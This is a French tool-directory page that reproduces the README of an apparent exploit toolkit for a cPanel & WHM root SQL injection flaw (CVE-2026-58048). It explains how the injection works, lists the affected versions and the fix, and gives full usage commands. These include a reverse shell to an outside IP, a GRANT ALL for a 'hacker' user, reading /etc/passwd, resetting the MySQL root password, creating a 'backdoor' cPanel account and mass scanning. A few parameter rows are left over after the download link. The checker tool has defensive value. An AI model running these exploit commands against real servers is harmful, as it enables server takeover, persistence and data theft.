Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-58048-PoC-Exploit — 👾 CVE-2026-58048 – Boîte à outils d'exécution SQL root cPanel (CVSS 9.4) | Suite complète Red/Blue Team Toolkit pour cPanel & WHM 11.x non corrigés. 2 outils : Safe Checker (audit/rapport), Weaponized (reverse shell, persistance, UDF RCE, déploiement, lecture/écriture de fichiers, opérations de base de données, scan de masse). Avec Python. 🦾 Utilisez-le de manière éthique, restez légal <3 | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-58048-poc-exploit
ReconnaissanceScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationTests d'IntrusionRed TeamingRéponse aux Incidents

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Sécurité des Bases de Données
GitHubtc4dy/cve-2026-58048-poc-exploit

CVE-2026-58048-PoC-Exploit

Voir le dépôt
525il y a 1 moisPas encore vérifié

À propos

👾 CVE-2026-58048 – Boîte à outils d'exécution SQL root cPanel (CVSS 9.4) | Suite complète Red/Blue Team Toolkit pour cPanel & WHM 11.x non corrigés. 2 outils : Safe Checker (audit/rapport), Weaponized (reverse shell, persistance, UDF RCE, déploiement, lecture/écriture de fichiers, opérations de base de données, scan de masse). Avec Python. 🦾 Utilisez-le de manière éthique, restez légal <3

Partager

CVEPoC

💥 CVE‑2026‑58048 – Boîte à outils d'exécution SQL root cPanel

Python 3.8+ CVSS Author cPanel

⚠️ USAGE ÉTHIQUE UNIQUEMENT – TESTS DE SÉCURITÉ AUTORISÉS
Ce dépôt fournit des outils destinés exclusivement aux professionnels de la sécurité autorisés, aux blue teams et aux testeurs d'intrusion.
L'accès non autorisé à des systèmes informatiques est illégal en vertu du CFAA (États-Unis), du Computer Misuse Act (Royaume-Uni), du TCK 243/244 (Turquie) et de lois similaires dans le monde entier.


📖 Aperçu de la vulnérabilité

CVE‑2026‑58048 est une vulnérabilité critique d'injection SQL dans les versions de cPanel & WHM qui permet à un utilisateur cPanel authentifié d'exécuter des commandes SQL arbitraires avec les via la fonctionnalité de renommage de base de données.

11.x
privilèges root MySQL

Fonctionnement

  1. Accès authentifié requis – l'attaquant doit disposer d'un compte cPanel valide (nom d'utilisateur/mot de passe) sur le serveur cible.
  2. Manipulation du mode SQL – l'exploit place la session MySQL en mode ANSI_QUOTES, ce qui modifie le comportement d'analyse syntaxique.
  3. Injection via renommage de base de données – lors du renommage d'une base de données, le nouveau nom n'est pas correctement assaini, ce qui permet à l'attaquant d'injecter des instructions SQL arbitraires.
  4. Privilèges root – comme l'opération de renommage s'exécute avec les privilèges root MySQL, le SQL injecté est exécuté avec les permissions de base de données les plus élevées.
  5. Impact – prise de contrôle complète des bases de données, élévation de privilèges, compromission du serveur, vol de données, portes dérobées et mouvement latéral. Mettez à jour immédiatement !

Versions affectées

  • cPanel & WHM 11.110 et antérieures – vulnérables
  • 11.111 – 11.118 – vulnérables
  • 11.119 – 11.126 – vulnérables
  • 11.127 – 11.134 – vulnérables
  • 11.135 – 11.136 – vulnérables
  • 11.137.x – vulnérables en dessous de 11.137.1.6
  • 11.138.1.6 et ultérieures – corrigées

Correctif

  • Mettez à jour vers cPanel & WHM 11.138.1.6 ou une version plus récente.
  • Si la mise à jour n'est pas possible, désactivez les opérations de renommage MySQL pour les utilisateurs cPanel comme solution de contournement temporaire.

🧰 Outils

OutilObjectifUtilisateur visé
exploit.pyBoîte à outils complète et weaponisée avec reverse shell, persistance, RCE via UDF, lecture/écriture de fichiers, opérations sur bases de données, prise en charge de proxy et scan de masse.Red teams / pentesters autorisés
safecheck.pyVérificateur de vulnérabilité non intrusif qui détecte la version de cPanel et évalue le risque sans exécuter de charge utile malveillante. Génère des rapports détaillés.Blue teams / auditeurs de sécurité

📊 Comparaison des fonctionnalités

Fonctionnalitéexploit.pysafecheck.py
Détection de vulnérabilité✅✅
Détection de version✅✅
Injection SQL root MySQL✅❌
Reverse shell✅❌
Persistance (création d'utilisateur cPanel)✅❌
RCE via UDF (exécution de commandes)✅❌
Lecture/écriture de fichiers✅❌
Opérations sur bases de données (SQL arbitraire)✅❌
Prise en charge de proxy✅✅
Scan de masse (multi‑thread)✅❌
Shell interactif✅❌
Mode non intrusif (sûr)❌✅
Mode verbeux/Débogage✅✅
Contrôle de vérification SSL✅✅
User‑Agent personnalisé✅✅
Délai entre requêtes / tentatives✅❌
Sortie JSON / rapport✅✅
Vérification d'accessibilité des endpoints❌✅
Détection de fuite du mode SQL❌✅

🎯 Résumé des cas d'usage

ScénarioOutil recommandé
Blue Team – vérifier si votre installation cPanel est vulnérablesafecheck.py
Audit de sécurité – évaluation de vulnérabilité non intrusivesafecheck.py
Red Team – test d'intrusion autorisé avec exploitation complèteexploit.py
Bug Bounty – test dans le cadre d'une divulgation responsablesafecheck.py
Scan de masse – vérification de multiples cibles pour la vulnérabilitéexploit.py (détection uniquement)
Réponse à incident – vérifier si des systèmes sont compromissafecheck.py

⚙️ Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
colorama
pymysql

📋 Paramètres

Paramètres de exploit.py

ParamètreDescription
-t, --targetURL cPanel cible (ex. https://cpanel.example.com:2083)
-l, --target-fileFichier contenant la liste des cibles (une par ligne) pour le scan de masse
-u, --mysql-userNom d'utilisateur cPanel/MySQL
-P, --mysql-passMot de passe cPanel/MySQL
--mysql-portPort MySQL (par défaut : 3306)
-p, --portRemplacer le port cPanel (par défaut depuis l'URL ou 2083)
--threadsNombre de threads pour le multi‑cibles (par défaut : 10)
-o, --outputEnregistrer les résultats dans un fichier (cible unique)
--logFichier journal pour une sortie détaillée
-v, --verboseSortie verbeuse
--proxyProxy HTTP/HTTPS (ex. http://127.0.0.1:8080)
-ua, --user-agentUser‑Agent personnalisé
--no-keep-aliveNe pas maintenir la session active
--delayDélai entre les requêtes (par défaut : 2.0s)
--max-retriesNombre maximal de tentatives (par défaut : 3)
--ssl-verifyVérifier les certificats SSL
--cmdCommande à exécuter (préfixer par sql: ou udf: pour spécifier)
--injectSQL personnalisé à injecter (remplace les autres actions)
--reverse-shellIP:PORT du reverse shell (utilise UDF)
--passwdChanger le mot de passe root MySQL
--adduserCréer un utilisateur cPanel (USER DOMAIN PASSWORD)

Paramètres de safecheck.py

ParamètreDescription
-t, --targetURL cPanel cible (ex. https://cpanel.example.com:2083)
-v, --verboseSortie verbeuse
--proxyProxy HTTP/HTTPS (ex. http://127.0.0.1:8080)
-ua, --user-agentUser‑Agent personnalisé
--ssl-verifyVérifier les certificats SSL
--timeoutDélai d'attente des requêtes en secondes (par défaut : 10)
--logEnregistrer le rapport dans un fichier
--jsonSortir les résultats au format JSON

💥 Scénarios

#ScénarioCommande
1Vérification rapide de vulnérabilitépython safecheck.py -t https://cpanel.example.com:2083
2Scan détaillé avec rapportpython safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v
3Reverse shellpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Exécuter du SQL personnalisé (root)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'"
5Lire un fichier sensiblepython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6Changer le mot de passe root MySQLpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Créer un nouvel utilisateur cPanel (persistance)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Shell interactif après exploitationpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Scan de masse depuis un fichierpython exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json
10Utiliser un proxy et un User‑Agent personnalisépython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)"

🧪 Utilisation des endpoints et de l'API

L'exploit utilise les endpoints UAPI cPanel suivants :

EndpointObjectif
/execute/Mysql/create_databaseCréer une base de données temporaire
/execute/Mysql/delete_databaseNettoyer les bases de données créées
/execute/Mysql/rename_databaseEndpoint vulnérable – déclenche l'injection SQL
/execute/Version/get_versionVérification de l'authentification et de la version
/execute/UserManager/create_userCréer un nouvel utilisateur cPanel (persistance)
/execute/UserManager/list_usersLister les utilisateurs existants

🛡️ Utilisation responsable

  • N'utilisez ces outils que sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test.
  • L'accès non autorisé est illégal et contraire à l'éthique.
  • Les auteurs ne sont pas responsables de toute utilisation abusive.
  • Respectez toujours les lois et réglementations de votre pays.

Ce logiciel est fourni à des fins éducatives et de tests de sécurité autorisés uniquement.

Télécharger l’outil
--readLire un fichier via LOAD_FILE
-i, --interactiveShell interactif après exploitation
--verifyVérifier le succès de l'exploit en tentant une connexion MySQL
--pingPing la cible avant exploitation